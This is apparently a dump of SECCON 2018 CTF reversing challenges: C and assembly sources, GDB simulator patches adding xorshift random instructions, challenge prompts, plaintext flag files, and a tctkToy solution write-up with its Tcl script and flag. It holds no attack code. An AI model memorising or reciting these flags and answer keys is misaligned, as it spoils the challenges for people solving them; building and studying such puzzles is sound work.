51 | 
52 | 	.globl	__exit
53 | 	.type	__exit, %function
54 | __exit:
55 | 	CALL_BRK
56 | 	ret
57 | 
58 | 	.globl	__read
59 | 	.type	__read, %function
60 | __read:
61 | 	mov	x8, #AngelSVC_Reason_Read
62 | 	CALL_HLT
63 | 	ret
64 | 
65 | 	.globl	__write
66 | 	.type	__write, %function
67 | __write:
68 | 	mov	x8, #AngelSVC_Reason_Write
69 | 	CALL_HLT
70 | 	ret
71 | 
72 | 	.globl	__open
73 | 	.type	__open, %function
74 | __open:
75 | 	mov	x8, #AngelSVC_Reason_Open
76 | 	CALL_HLT
77 | 	ret
78 | 
79 | 	.globl	__close
80 | 	.type	__close, %function
81 | __close:
82 | 	mov	x8, #AngelSVC_Reason_Close
83 | 	CALL_HLT
84 | 	ret
85 | 
86 | 	.align 8
87 | _stack_addr:
88 | 	.long	_estack
89 | 


--------------------------------------------------------------------------------
/Reversing/special_device/build/build/cross-gcc494/exec/sample.c:
--------------------------------------------------------------------------------
  1 | /* #define MAKE_QUESTION */
  2 | 
  3 | #include "syscall.h"
  4 | 
  5 | #ifdef USE_SYSCALL_WRAPPER
  6 | void __exit(int status)
  7 | {
  8 |   __r_exit(0, status);
  9 | }
 10 | int __read(int fd, void *buffer, int size)
 11 | {
 12 |   return __r_read(0, fd, buffer, size);
 13 | }
 14 | int __write(int fd, const void *buffer, int size)
 15 | {
 16 |   return __r_write(0, fd, buffer, size);
 17 | }
 18 | int __open(const char *path, int flags, int mode)
 19 | {
 20 |   return __r_open(0, path, flags, mode);
 21 | }
 22 | int __close(int fd)
 23 | {
 24 |   return __r_close(0, fd);
 25 | }
 26 | #endif
 27 | 
 28 | void exit(int status)
 29 | {
 30 |   __exit(status);
 31 | }
 32 | 
 33 | int write1(int fd, unsigned char c)
 34 | {
 35 |   return __write(fd, &c, 1);
 36 | }
 37 | 
 38 | int putchar(int fd, int c)
 39 | {
 40 |   write1(fd, c);
 41 |   return c;
 42 | }
 43 | 
 44 | int puts(int fd, char *str)
 45 | {
 46 |   for (; *str; str++)
 47 |     putchar(fd, *str);
 48 |   return 0;
 49 | }
 50 | 
 51 | #ifdef RSHIFT
 52 | /*
 53 |  * For architecture not to be able to use shift instruction for well,
 54 |  * execute shift operation without shift instruction.
 55 |  */
 56 | unsigned long rshift1(unsigned long value)
 57 | {
 58 |   unsigned long mask, bit = 1;
 59 |   unsigned long ret = 0;
 60 |   int i;
 61 | 
 62 |   for (i = 0; i < sizeof(unsigned long) * 8 - 1; i++) {
 63 |     mask = bit + bit; /* Use addition for no using shift and multiplication */
 64 |     if (value & mask)
 65 |       ret |= bit;
 66 |     bit = bit + bit;
 67 |   }
 68 | 
 69 |   return ret;
 70 | }
 71 | 
 72 | unsigned long RSHIFT(unsigned long value)
 73 | {
 74 |   int num = 4;
 75 |   for (; num > 0; num--)
 76 |     value = rshift1(value);
 77 |   return value;
 78 | }
 79 | #endif
 80 | 
 81 | int putxval(int fd, unsigned long value, int column)
 82 | {
 83 |   char buf[17];
 84 |   char *p;
 85 | 
 86 |   p = buf + sizeof(buf) - 1;
 87 |   *(p--) = '\0';
 88 | 
 89 |   if (!value && !column)
 90 |     column++;
 91 | 
 92 |   while (value || column) {
 93 |     *(p--) = "0123456789abcdef"[value & 0xf];
 94 |     value >>= 4;
 95 |     if (column) column--;
 96 |   }
 97 | 
 98 |   puts(fd, p + 1);
 99 | 
100 |   return 0;
101 | }
102 | 
103 | unsigned char randval[] = {
104 |   0x1D, 0xAB, 0x1B, 0x0F, 0xA7, 0xD9, 0x1A, 0xB0,
105 |   0x61, 0x7E, 0xB6, 0x48, 0xA4, 0x56, 0xCF, 0x7E,
106 |   0x49, 0x05, 0xFD, 0x05, 0x9C, 0xF9, 0x54, 0x45,
107 |   0xFA, 0x24, 0xC6, 0x1D, 0x68, 0xF2, 0x46, 0xCE,
108 |   0xC1, 0xAD, 0xAB, 0x08, 0x24, 0x86, 0x9C, 0xF8,
109 |   0x58, 0x65, 0x62, 0x88, 0x49, 0x22, 0x82, 0x11,
110 |   0x29, 0x14, 0x63, 0x74, 0xAE, 0x28, 0xCE, 0x8C,
111 |   0x79, 0x2D, 0xAB, 0x07, 0xBB, 0x75, 0x25, 0x9D,
112 | };
113 | 
114 | #ifdef MAKE_QUESTION
115 | unsigned char flag[] = "SECCON{UseTheSpecialDeviceFile}";
116 | #else
117 | unsigned char flag[] = {
118 |   0xFE, 0x75, 0x88, 0xA9, 0x5A, 0xAA, 0x10, 0x52,
119 |   0x9C, 0x6A, 0x67, 0xF4, 0x82, 0xBE, 0x21, 0x56,
120 |   0x59, 0x0B, 0x97, 0x32, 0x21, 0x46, 0x93, 0xAE,
121 |   0x40, 0x0D, 0x2E, 0x1F, 0x83, 0x43, 0x40, 0
122 | };
123 | #endif
124 | 
125 | unsigned long get_random_value(int fd)
126 | {
127 |   unsigned long value;
128 |   __read(fd, &value, sizeof(value));
129 |   return value;
130 | }
131 | 
132 | unsigned char *decode(unsigned char *str, unsigned char *key, int fd)
133 | {
134 |   int i;
135 |   for (i = 0; str[i]; i++) {
136 |     str[i] ^= (key[i] ^ get_random_value(fd));
137 |   }
138 |   return str;
139 | }
140 | 
141 | int main()
142 | {
143 |   int fd;
144 |   unsigned long seed = 88172645463325252UL;
145 | 
146 |   fd = __open("/dev/xorshift64", 1, 0); /* O_WRONLY */
147 |   __write(fd, &seed, sizeof(seed));
148 |   __close(fd);
149 | 
150 |   fd = __open("/dev/xorshift64", 0, 0); /* O_RDONLY */
151 |   puts(1, (char *)decode(flag, randval, fd));
152 |   puts(1, "\n");
153 |   __close(fd);
154 | 
155 |   exit(0);
156 |   return 0;
157 | }
158 | 


--------------------------------------------------------------------------------
/Reversing/special_device/build/build/cross-gcc494/exec/syscall.h:
--------------------------------------------------------------------------------
 1 | #ifndef	_SYSCALL_H_INCLUDED_
 2 | #define	_SYSCALL_H_INCLUDED_
 3 | 
 4 | void __exit(int status) __attribute__((noreturn));
 5 | int __read(int fd, void *buffer, int size);
 6 | int __write(int fd, const void *buffer, int size);
 7 | int __open(const char *path, int flags, int mode);
 8 | int __close(int fd);
 9 | 
10 | #ifdef USE_SYSCALL_WRAPPER
11 | void __r_exit(int dummy, int status) __attribute__((noreturn));
12 | int __r_read(int dummy, int fd, void *buffer, int size);
13 | int __r_write(int dummy, int fd, const void *buffer, int size);
14 | int __r_open(int dummy, const char *path, int flags, int mode);
15 | int __r_close(int dummy, int fd);
16 | #endif
17 | 
18 | #endif
19 | 


--------------------------------------------------------------------------------
/Reversing/special_device/build/patch/patch-gdb-8.2-log2.txt:
--------------------------------------------------------------------------------
 1 | --- sim/common/dv-cfi.c.orig	2018-01-05 13:07:23.000000000 +0900
 2 | +++ sim/common/dv-cfi.c	2018-09-25 23:43:57.494099000 +0900
 3 | @@ -573,6 +573,23 @@
 4 |                   max: 1µs, 1ms, 1ms, not supported
 5 |  
 6 |    TODO: Verify user args are valid (e.g. voltage is 8 bits).  */
 7 | +static unsigned long _log2ul(unsigned long x)
 8 | +{
 9 | +  unsigned long result = 0;
10 | +  while ((x >>= 1) != 0) {
11 | +    result++;
12 | +  }
13 | +  return result;
14 | +}
15 | +#if 1
16 | +#define log2(x) _log2ul(x)
17 | +#else /* compatible with original log2() */
18 | +static double _log2d(double x)
19 | +{
20 | +  return _log2ul(x);
21 | +}
22 | +#define log2(x) _log2d(x)
23 | +#endif
24 |  static void
25 |  attach_cfi_regs (struct hw *me, struct cfi *cfi)
26 |  {
27 | 


--------------------------------------------------------------------------------
/Reversing/special_device/build/test/Makefile:
--------------------------------------------------------------------------------
1 | all :
2 | 	gcc sample.c -o question -Wall -DMAKE_QUESTION
3 | 	gcc sample.c -o answer -Wall
4 | 
5 | clean :
6 | 	rm -f question answer
7 | 


--------------------------------------------------------------------------------
/Reversing/special_device/build/test/sample.c:
--------------------------------------------------------------------------------
 1 | /* #define MAKE_QUESTION */
 2 | 
 3 | #include <stdio.h>
 4 | #include <sys/types.h>
 5 | 
 6 | unsigned char randval[] = {
 7 |   0x1D, 0xAB, 0x1B, 0x0F, 0xA7, 0xD9, 0x1A, 0xB0,
 8 |   0x61, 0x7E, 0xB6, 0x48, 0xA4, 0x56, 0xCF, 0x7E,
 9 |   0x49, 0x05, 0xFD, 0x05, 0x9C, 0xF9, 0x54, 0x45,
10 |   0xFA, 0x24, 0xC6, 0x1D, 0x68, 0xF2, 0x46, 0xCE,
11 |   0xC1, 0xAD, 0xAB, 0x08, 0x24, 0x86, 0x9C, 0xF8,
12 |   0x58, 0x65, 0x62, 0x88, 0x49, 0x22, 0x82, 0x11,
13 |   0x29, 0x14, 0x63, 0x74, 0xAE, 0x28, 0xCE, 0x8C,
14 |   0x79, 0x2D, 0xAB, 0x07, 0xBB, 0x75, 0x25, 0x9D,
15 | };
16 | 
17 | #ifdef MAKE_QUESTION
18 | unsigned char flag[] = "SECCON{UseTheSpecialDeviceFile}";
19 | #else
20 | unsigned char flag[] = {
21 |   0xFE, 0x75, 0x88, 0xA9, 0x5A, 0xAA, 0x10, 0x52,
22 |   0x9C, 0x6A, 0x67, 0xF4, 0x82, 0xBE, 0x21, 0x56,
23 |   0x59, 0x0B, 0x97, 0x32, 0x21, 0x46, 0x93, 0xAE,
24 |   0x40, 0x0D, 0x2E, 0x1F, 0x83, 0x43, 0x40, 0
25 | };
26 | #endif
27 |  
28 | void random_init(uint64_t seed);
29 | uint64_t get_random_value(void);
30 | 
31 | static uint64_t random_value = 88172645463325252ULL;
32 | 
33 | void random_init(uint64_t seed)
34 | {
35 |   random_value = seed;
36 | }
37 | 
38 | uint64_t get_random_value(void)
39 | {
40 |   /* xorshift (64bit) */
41 |   random_value = random_value ^ (random_value << 13);
42 |   random_value = random_value ^ (random_value >>  7);
43 |   random_value = random_value ^ (random_value << 17);
44 |   return random_value;
45 | }
46 | 
47 | unsigned char *decode(unsigned char *str, unsigned char *key)
48 | {
49 |   int i;
50 |   for (i = 0; str[i]; i++) {
51 |     str[i] ^= (key[i] ^ get_random_value());
52 |   }
53 |   return str;
54 | }
55 | 
56 | int main()
57 | {
58 |   random_init(88172645463325252ULL);
59 |   printf("%s\n", decode(flag, randval));
60 |   return 0;
61 | }
62 | 


--------------------------------------------------------------------------------
/Reversing/special_device/files/runme_8a10b7425cea81a043db0fd352c82a370a2d3373:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/special_device/files/runme_8a10b7425cea81a043db0fd352c82a370a2d3373


--------------------------------------------------------------------------------
/Reversing/special_device/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{UseTheSpecialDeviceFile}
2 | 


--------------------------------------------------------------------------------
/Reversing/special_device/question.txt:
--------------------------------------------------------------------------------
 1 | Special Device File
 2 | 
 3 | Execute this file and get the flag.
 4 | 
 5 | References:
 6 | 
 7 | * Assembly samples for many architectures
 8 | 
 9 |   http://kozos.jp/books/asm/cross-gcc494-v1.0.zip
10 | 
11 |   See the assembly samples.
12 | 
13 |   $ unzip cross-gcc494-v1.0.zip
14 |   $ cd cross-gcc494/sample
15 |   $ ls *.d
16 | 
17 |   See the sample programs running on GDB simulator.
18 | 
19 |   $ cd cross-gcc494/exec
20 |   $ ls *.d
21 | 


--------------------------------------------------------------------------------
/Reversing/special_instractions/build/build.txt:
--------------------------------------------------------------------------------
 1 | ■ 環境構築方法
 2 | 
 3 | ・以下のツールによりクロスビルド環境を構築
 4 |   http://kozos.jp/books/asm/cross-gcc494-v1.0.tgz
 5 | 
 6 |   (構築例)
 7 |   $ tar xvzf cross-gcc494-v1.0.tgz
 8 |   $ cd cross-gcc494
 9 |   $ vi config.sh (modiry install_dir and makeopt)
10 |   $ cd toolchain
11 |   $ ./fetch.sh
12 |   $ ./setup.sh
13 |   $ cd ../build
14 |   $ ./setup-all.sh
15 |   $ ./build-install-clean-all.sh moxie-elf
16 | 
17 | ■ おしまい
18 | 


--------------------------------------------------------------------------------
/Reversing/special_instractions/build/build/cross-gcc494/KL-01:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/special_instractions/build/build/cross-gcc494/KL-01


--------------------------------------------------------------------------------
/Reversing/special_instractions/build/build/cross-gcc494/LICENSE:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/special_instractions/build/build/cross-gcc494/LICENSE


--------------------------------------------------------------------------------
/Reversing/special_instractions/build/build/cross-gcc494/config.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | 
 3 | #install_dir="/usr/local/cross-gcc494"
 4 | install_dir="$HOME/cross-gcc494"
 5 | 
 6 | binutils="binutils-2.28"
 7 | gcc="gcc-4.9.4"
 8 | newlib="newlib-2.5.0"
 9 | gdb="gdb-7.12.1"
10 | 
11 | gmp="gmp-6.1.2"
12 | mpfr="mpfr-3.1.5"
13 | mpc="mpc-1.0.3"
14 | 
15 | #makeopt="-j 2"
16 | 


--------------------------------------------------------------------------------
/Reversing/special_instractions/build/build/cross-gcc494/exec/ld.scr:
--------------------------------------------------------------------------------
 1 | ENTRY("_start")
 2 | 
 3 | SECTIONS
 4 | {
 5 | 	/* for Motorola 68HC11 */
 6 | 	_.tmp = 0x40; . += 4;
 7 | 	_.xy = .; . += 4; _.z = .; . += 4;
 8 | 	/* for option -fno-omit-frame-pointer */
 9 | 	_.frame = .; . += 4;
10 | 	/* without option -msoft-reg-count */
11 | 	_.d1 = .; . += 4; _.d2 = .; . += 4;
12 | 	_.d3 = .; . += 4; _.d4 = .; . += 4;
13 | 
14 | 	.text 0x1400 : {
15 | 		*(.text .text.*)
16 | 		_etext = .;
17 | 	}
18 | 
19 | 	.rodata : {
20 | 		*(.rodata .rodata.*)
21 | 		_erodata = .;
22 | 	}
23 | 
24 | 	. = ALIGN(0x400);
25 | 	_gp = .;
26 | 
27 | 	.data : {
28 | 		*(.data .data.*)
29 | 		*(.sdata .sdata.*)
30 | 		_edata = .;
31 | 	}
32 | 
33 | 	.bss : {
34 | 		*(.bss .bss.*)
35 | 		*(.sbss .sbss.*)
36 | 		*(.scommon)
37 | 		*(COMMON)
38 | 		_ebss = .;
39 | 	}
40 | 
41 | 	.stack ALIGN(16) : {
42 | 		. += 1024;
43 | 		_estack = .;
44 | 	}
45 | 
46 | 	_end = .;
47 | }
48 | 


--------------------------------------------------------------------------------
/Reversing/special_instractions/build/build/cross-gcc494/exec/lib-moxie-elf.S:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * Use swi instruction.
 3 |  * See gdb/sim/moxie/interp.c:sim_engine_run()
 4 |  * (case 0x30:)
 5 |  */
 6 | 
 7 | #define SYS_exit  1
 8 | #define SYS_open  2
 9 | #define SYS_close /* not defined */
10 | #define SYS_read  4
11 | #define SYS_write 5
12 | 
13 | 	.section .text
14 | 
15 | 	.globl	_start
16 | 	.type	_start, @function
17 | _start:
18 | 	ldi.l	$sp, _estack
19 | 	jsra	main
20 | 
21 | 	/*
22 | 	 * Registers as return value and first argument are same.
23 | 	 * Setup of first argument is unneed.
24 | 	 */
25 | 	/* fall through */
26 | 
27 | 	.globl	__exit
28 | 	.type	__exit, @function
29 | __exit:
30 | 	mov	$r2, $r0
31 | 	swi	SYS_exit
32 | 	mov	$r0, $r2
33 | 	ret
34 | 
35 | 	.globl	__read
36 | 	.type	__read, @function
37 | __read:
38 | 	mov	$r4, $r2
39 | 	mov	$r3, $r1
40 | 	mov	$r2, $r0
41 | 	swi	SYS_read
42 | 	mov	$r0, $r2
43 | 	ret
44 | 
45 | 	.globl	__write
46 | 	.type	__write, @function
47 | __write:
48 | 	mov	$r4, $r2
49 | 	mov	$r3, $r1
50 | 	mov	$r2, $r0
51 | 	swi	SYS_write
52 | 	mov	$r0, $r2
53 | 	ret
54 | 
55 | 	.globl	__open
56 | 	.type	__open, @function
57 | __open:
58 | 	mov	$r4, $r2
59 | 	mov	$r3, $r1
60 | 	mov	$r2, $r0
61 | 	swi	SYS_open
62 | 	mov	$r0, $r2
63 | 	ret
64 | 
65 | 	.globl	__close
66 | 	.type	__close, @function
67 | __close:
68 | 	/* not defined */
69 | 	ret
70 | 


--------------------------------------------------------------------------------
/Reversing/special_instractions/build/build/cross-gcc494/exec/moxie-elf.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/special_instractions/build/build/cross-gcc494/exec/moxie-elf.o


--------------------------------------------------------------------------------
/Reversing/special_instractions/build/build/cross-gcc494/exec/moxie-elf.x:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/special_instractions/build/build/cross-gcc494/exec/moxie-elf.x


--------------------------------------------------------------------------------
/Reversing/special_instractions/build/build/cross-gcc494/exec/syscall.h:
--------------------------------------------------------------------------------
 1 | #ifndef	_SYSCALL_H_INCLUDED_
 2 | #define	_SYSCALL_H_INCLUDED_
 3 | 
 4 | void __exit(int status) __attribute__((noreturn));
 5 | int __read(int fd, void *buffer, int size);
 6 | int __write(int fd, const void *buffer, int size);
 7 | int __open(const char *path, int flags, int mode);
 8 | int __close(int fd);
 9 | 
10 | #ifdef USE_SYSCALL_WRAPPER
11 | void __r_exit(int dummy, int status) __attribute__((noreturn));
12 | int __r_read(int dummy, int fd, void *buffer, int size);
13 | int __r_write(int dummy, int fd, const void *buffer, int size);
14 | int __r_open(int dummy, const char *path, int flags, int mode);
15 | int __r_close(int dummy, int fd);
16 | #endif
17 | 
18 | #endif
19 | 


--------------------------------------------------------------------------------
/Reversing/special_instractions/build/patch/patch-gdb-8.2-log2.txt:
--------------------------------------------------------------------------------
 1 | --- sim/common/dv-cfi.c.orig	2018-01-05 13:07:23.000000000 +0900
 2 | +++ sim/common/dv-cfi.c	2018-09-25 23:43:57.494099000 +0900
 3 | @@ -573,6 +573,23 @@
 4 |                   max: 1µs, 1ms, 1ms, not supported
 5 |  
 6 |    TODO: Verify user args are valid (e.g. voltage is 8 bits).  */
 7 | +static unsigned long _log2ul(unsigned long x)
 8 | +{
 9 | +  unsigned long result = 0;
10 | +  while ((x >>= 1) != 0) {
11 | +    result++;
12 | +  }
13 | +  return result;
14 | +}
15 | +#if 1
16 | +#define log2(x) _log2ul(x)
17 | +#else /* compatible with original log2() */
18 | +static double _log2d(double x)
19 | +{
20 | +  return _log2ul(x);
21 | +}
22 | +#define log2(x) _log2d(x)
23 | +#endif
24 |  static void
25 |  attach_cfi_regs (struct hw *me, struct cfi *cfi)
26 |  {
27 | 


--------------------------------------------------------------------------------
/Reversing/special_instractions/build/patch/patch-gdb-8.2-moxie-nodtb.txt:
--------------------------------------------------------------------------------
 1 | --- sim/moxie/Makefile.in.orig	2018-01-05 13:07:23.000000000 +0900
 2 | +++ sim/moxie/Makefile.in	2018-09-25 23:44:47.041521000 +0900
 3 | @@ -25,12 +25,12 @@
 4 |  	sim-resume.o
 5 |  
 6 |  SIM_EXTRA_LIBS = -lm -lz
 7 | -SIM_EXTRA_INSTALL = install-dtb
 8 | +#SIM_EXTRA_INSTALL = install-dtb
 9 |  SIM_EXTRA_CFLAGS = -DDTB="\"$(dtbdir)/moxie-gdb.dtb\""
10 |  
11 |  ## COMMON_POST_CONFIG_FRAG
12 |  
13 | -all: moxie-gdb.dtb
14 | +#all: moxie-gdb.dtb
15 |  
16 |  moxie-gdb.dtb: moxie-gdb.dts
17 |  	dtc -O dtb -o moxie-gdb.dtb ${srcdir}/moxie-gdb.dts
18 | 


--------------------------------------------------------------------------------
/Reversing/special_instractions/build/patch/patch-gdb-8.2-moxie-random.txt:
--------------------------------------------------------------------------------
 1 | --- sim/moxie/interp.c.orig	2018-01-05 13:07:23.000000000 +0900
 2 | +++ sim/moxie/interp.c	2018-09-25 22:39:59.612190000 +0900
 3 | @@ -239,6 +239,30 @@
 4 |  	      cpu.asregs.regs[11], cpu.asregs.regs[12], cpu.asregs.regs[13], \
 5 |  	      cpu.asregs.regs[14], cpu.asregs.regs[15])
 6 |  
 7 | +#define RANDOM_INSTRUCTION
 8 | +#ifdef RANDOM_INSTRUCTION
 9 | +
10 | +void random_init(uint32_t seed);
11 | +uint32_t get_random_value(void);
12 | +
13 | +static uint32_t random_value = 2463534242U;
14 | +
15 | +void random_init(uint32_t seed)
16 | +{
17 | +  random_value = seed;
18 | +}
19 | +
20 | +uint32_t get_random_value(void)
21 | +{
22 | +  /* xorshift (32bit) */
23 | +  random_value = random_value ^ (random_value << 13);
24 | +  random_value = random_value ^ (random_value >> 17);
25 | +  random_value = random_value ^ (random_value << 15);
26 | +  return random_value;
27 | +}
28 | +
29 | +#endif
30 | +
31 |  void
32 |  sim_engine_run (SIM_DESC sd,
33 |  		int next_cpu_nr, /* ignore  */
34 | @@ -660,8 +684,27 @@
35 |  		cpu.asregs.regs[a] = r >> 32;
36 |  	      }
37 |  	      break;
38 | +#ifdef RANDOM_INSTRUCTION
39 | +	    case 0x16: /* set random seed */
40 | +	      {
41 | +		int reg = (inst >> 4) & 0xf;
42 | +
43 | +		MOXIE_TRACE_INSN ("setrseed");
44 | +		random_init(cpu.asregs.regs[reg]);
45 | +	      }
46 | +	      break;
47 | +	    case 0x17: /* get random value */
48 | +	      {
49 | +		int reg = (inst >> 4) & 0xf;
50 | +
51 | +		MOXIE_TRACE_INSN ("getrand");
52 | +		cpu.asregs.regs[reg] = get_random_value();
53 | +	      }
54 | +	      break;
55 | +#else
56 |  	    case 0x16: /* bad */
57 |  	    case 0x17: /* bad */
58 | +#endif
59 |  	    case 0x18: /* bad */
60 |  	      {
61 |  		opc = opcode;
62 | 


--------------------------------------------------------------------------------
/Reversing/special_instractions/build/test/Makefile:
--------------------------------------------------------------------------------
1 | all :
2 | 	gcc sample.c -o question -Wall -DMAKE_QUESTION
3 | 	gcc sample.c -o answer -Wall
4 | 
5 | clean :
6 | 	rm -f question answer
7 | 


--------------------------------------------------------------------------------
/Reversing/special_instractions/build/test/sample.c:
--------------------------------------------------------------------------------
 1 | /* #define MAKE_QUESTION */
 2 | 
 3 | #include <stdio.h>
 4 | #include <sys/types.h>
 5 | 
 6 | unsigned char randval[] = {
 7 |   0x3D, 0x05, 0xDC, 0x31, 0xD1, 0x8A, 0xAF, 0x29,
 8 |   0x96, 0xFA, 0xCB, 0x1B, 0x01, 0xEC, 0xE2, 0xF7,
 9 |   0x15, 0x70, 0x6C, 0xF4, 0x7E, 0xA1, 0x9E, 0x0E,
10 |   0x01, 0xF9, 0xC2, 0x4C, 0xBA, 0xA0, 0xA1, 0x08,
11 |   0x70, 0x24, 0x85, 0x8A, 0x4D, 0x2D, 0x3C, 0x02,
12 |   0xFC, 0x6F, 0x20, 0xF0, 0xC7, 0xAD, 0x2F, 0x97,
13 |   0x2B, 0xCC, 0xA3, 0x34, 0x23, 0x53, 0xC9, 0xB7,
14 |   0x0C, 0x10, 0x6C, 0x0E, 0xFA, 0xF9, 0xA1, 0x9A,
15 | };
16 | 
17 | #ifdef MAKE_QUESTION
18 | unsigned char flag[] = "SECCON{MakeSpecialInstructions}";
19 | #else
20 | unsigned char flag[] = {
21 |   0x6D, 0x72, 0xC3, 0xE2, 0xCF, 0x95, 0x54, 0x9D,
22 |   0xB6, 0xAC, 0x03, 0x84, 0xC3, 0xC2, 0x35, 0x93,
23 |   0xC3, 0xD7, 0x7C, 0xE2, 0xDD, 0xD4, 0xAC, 0x5E,
24 |   0x99, 0xC9, 0xA5, 0x34, 0xDE, 0x06, 0x4E, 0
25 | };
26 | #endif
27 |  
28 | void random_init(uint32_t seed);
29 | uint32_t get_random_value(void);
30 | 
31 | static uint32_t random_value = 2463534242U;
32 | 
33 | void random_init(uint32_t seed)
34 | {
35 |   random_value = seed;
36 | }
37 | 
38 | uint32_t get_random_value(void)
39 | {
40 |   /* xorshift (32bit) */
41 |   random_value = random_value ^ (random_value << 13);
42 |   random_value = random_value ^ (random_value >> 17);
43 |   random_value = random_value ^ (random_value << 15);
44 |   return random_value;
45 | }
46 | 
47 | unsigned char *decode(unsigned char *str, unsigned char *key)
48 | {
49 |   int i;
50 |   for (i = 0; str[i]; i++) {
51 |     str[i] ^= (key[i] ^ get_random_value());
52 |   }
53 |   return str;
54 | }
55 | 
56 | int main()
57 | {
58 |   random_init(2463534242U);
59 |   printf("%s\n", decode(flag, randval));
60 |   return 0;
61 | }
62 | 


--------------------------------------------------------------------------------
/Reversing/special_instractions/files/runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/special_instractions/files/runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be


--------------------------------------------------------------------------------
/Reversing/special_instractions/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{MakeSpecialInstructions}
2 | 


--------------------------------------------------------------------------------
/Reversing/special_instractions/question.txt:
--------------------------------------------------------------------------------
 1 | Special Instructions
 2 | 
 3 | Execute this file and get the flag.
 4 | 
 5 | References:
 6 | 
 7 | * Assembly samples for many architectures
 8 | 
 9 |   http://kozos.jp/books/asm/cross-gcc494-v1.0.zip
10 | 
11 |   See the assembly samples.
12 | 
13 |   $ unzip cross-gcc494-v1.0.zip
14 |   $ cd cross-gcc494/sample
15 |   $ ls *.d
16 | 
17 |   See the sample programs running on GDB simulator.
18 | 
19 |   $ cd cross-gcc494/exec
20 |   $ ls *.d
21 | 


--------------------------------------------------------------------------------
/Reversing/tctkToy/answer.txt:
--------------------------------------------------------------------------------
 1 | tctkToy read CommandLine arguments in spite of GUI application.
 2 | 
 3 | 1 -> build & check 
 4 | 2 -> help message
 5 | no option and others -> Error message
 6 | 
 7 | At first, run tctkToy.exe with argument “1”
 8 | It reads a .tcl file by using Tcl_EvalFile() and has some check procedure of the .tcl file.
 9 | 
10 | Then, you must create the directory C:\\tctkToy to pass the 1st stage.
11 | 
12 | Challengers can pass all procedure by drag&drop a .tcl file like below. 
13 | The directory located face.png is anywhere it can read.
14 | And you don’t have to set the specific button’s options and the text content.
15 |  
16 | 
17 | ———————— .tcl ———————
18 | cd C:\\tctkToy
19 | exec $env(COMSPEC) /c start C:\\Windows\\System32\\taskmgr.exe
20 | wm title . "tctkROBO"
21 | canvas .cv1
22 | image create photo face -file C:\\\\Users\\\\XXXX\\\\face.png
23 | .cv1 create image 200 100 -image face
24 | .cv1 create text 150 250 -text "Commands List" -anchor nw
25 | pack .cv1
26 | button .btn_1  -text "Go"  -width 100 -background  green -command { exit 0} 
27 | pack .btn_1                                                                                 
28 | button .btn_2  -text "Back"  -width 100 -background blue -command { exit 0} 
29 | pack .btn_2
30 | button .btn_3  -text "Stop"  -width 100 -background  red -command { exit 0} 
31 | pack .btn_3
32 | ————————————————————
33 | 
34 | if the flag don’t pass the score server despite you get “congraturation! flag is SECCON{a683618184fc18105b7157a52727d004681844be54fd792add4c90ff15a66e6f}” window.
35 | Please see the appearing message window of this. This is a hint.
36 | 
37 | MessageBox(hWnd, "review the order following FINISH view. 'pack' must be used once for each component", "If you cannot pass the flag??", MB_OK);
38 | 
39 | The flag is sha256 hash which is the combination of the first two characters of the tcl file you drag&drop.
40 |  
41 | 


--------------------------------------------------------------------------------
/Reversing/tctkToy/build/tctkToy.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 15
 4 | VisualStudioVersion = 15.0.28010.2019
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "tctkToy", "tctkToy\tctkToy.vcxproj", "{3FA7413E-5CFA-40A6-9D09-B7451C3F4FE0}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{3FA7413E-5CFA-40A6-9D09-B7451C3F4FE0}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{3FA7413E-5CFA-40A6-9D09-B7451C3F4FE0}.Debug|x64.Build.0 = Debug|x64
18 | 		{3FA7413E-5CFA-40A6-9D09-B7451C3F4FE0}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{3FA7413E-5CFA-40A6-9D09-B7451C3F4FE0}.Debug|x86.Build.0 = Debug|Win32
20 | 		{3FA7413E-5CFA-40A6-9D09-B7451C3F4FE0}.Release|x64.ActiveCfg = Release|x64
21 | 		{3FA7413E-5CFA-40A6-9D09-B7451C3F4FE0}.Release|x64.Build.0 = Release|x64
22 | 		{3FA7413E-5CFA-40A6-9D09-B7451C3F4FE0}.Release|x86.ActiveCfg = Release|Win32
23 | 		{3FA7413E-5CFA-40A6-9D09-B7451C3F4FE0}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {DFE56925-FA9C-43B1-8AAC-F905D0387A69}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/Reversing/tctkToy/build/tctkToy/Resource.h:
